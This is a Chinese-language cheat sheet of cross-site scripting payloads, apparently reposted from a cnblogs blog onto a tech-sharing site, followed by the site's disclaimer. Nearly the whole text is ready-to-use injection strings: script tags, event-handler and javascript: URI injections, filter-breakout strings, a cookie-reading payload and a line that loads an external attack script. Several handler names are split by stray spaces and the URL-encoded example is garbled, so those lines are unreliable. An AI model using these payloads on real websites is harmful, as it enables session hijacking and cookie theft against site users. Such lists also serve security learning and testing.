标签:xss javascript 常见 alert 111 onmouseover payload
payload-有效载荷:
<script>alert(1)</script> #最普通的xss
<script>alert(document.cookie)</script> #获取cookie
<a href="javascript:alert('xss')">xss</a> #a链接的xss
<script src='http://baidu.com/xss.js'></script> # 外部攻击代码
<img src=x one rror=alert(1)> #加载图形失败执行
<iframe onl oad=alert('xss')> #框架
<svg onl oad=alert(1)>
<video onl oadstart=alert(1) src="/media/hack-the-planet.mp4" />
<body onl oad=alert(1)>
<style onl oad=alert(1)></style>
<input onm ouseover=alert(1)> (简单防绕过)
#' onclick="alert(111)"> (使用DOM型的xss)
xss之htmlspecialchars方法:
1) ' onclick='alert(111)'
2) ' onm ouseover='alert(1)
3) ' onm ouseover='javascript:alert(1)'
xss之href输出:(输入的参数在herf标签中,可以使用javascript协议来执行js)
javascript:alert(1)
xss之js输出
lili'</script><script>alert("xss")</script>
对于GET和POST 方式的,随便输入,检查在标签<p>中,就可以直接用简单的payload进行注入,如:
<script>alert(1)</script>
<input onm ouseover=alert(1)>
<body onl oad=alert(1)>
URL编码:
"onmouseover="61leralertt(11) %22onmouseover%3D%2261leralertt(11)
标签:xss,javascript,常见,alert,111,onmouseover,payload 来源: https://www.cnblogs.com/13659188850cz/p/15527031.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。